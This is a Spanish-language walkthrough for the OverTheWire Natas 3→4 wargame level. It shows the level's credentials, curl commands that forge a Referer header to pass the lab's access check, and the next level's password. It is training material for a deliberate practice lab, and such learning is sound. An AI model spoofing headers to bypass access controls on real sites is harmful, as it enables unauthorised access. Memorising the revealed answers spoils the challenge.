OverTheWire - Natas 3 -> 4 (sin navegador)

August 2022

Información

Las contraseñas cambian cada cierto tiempo, existe la posibilidad de que esta contraseña ya no sea válida

Username: natas4
Password: Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ
URL:      http://natas4.natas.labs.overthewire.org

Solución

Primero ejecutamos el comando curl con el parámetro -u para indicar las credenciales.

curl -u natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ http://natas4.natas.labs.overthewire.org/

Vemos que al final de la página nos da instrucciones para visualizar la contraseña del siguiente nivel. Nos señala que solo los usuarios que vengan desde “http://natas5.natas.labs.overthewire.org/” pueden ver la contraseña.

Si agregamos la cabecera Referer: http://natas5.natas.labs.overthewire.org/ podremos ver la contraseña, y con el parámetro -H agregamos esta cabecera a nuestro comando de curl.

Con este comando resolvemos el reto:

curl -u natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ http://natas4.natas.labs.overthewire.org/ -H 'Referer: http://natas5.natas.labs.overthewire.org/'

Contraseña

iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq

Anterior

Siguiente